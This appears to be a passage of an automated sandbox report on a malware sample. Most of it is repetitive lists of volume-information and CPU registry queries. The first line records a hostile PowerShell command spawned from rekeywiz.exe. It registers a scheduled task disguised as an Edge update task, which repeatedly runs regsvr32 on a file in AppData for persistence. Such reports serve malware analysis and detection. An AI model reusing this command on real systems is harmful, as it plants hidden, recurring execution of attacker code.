Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/osyu.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{848cc004-cc00-4888-c000-44488ccc0488}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
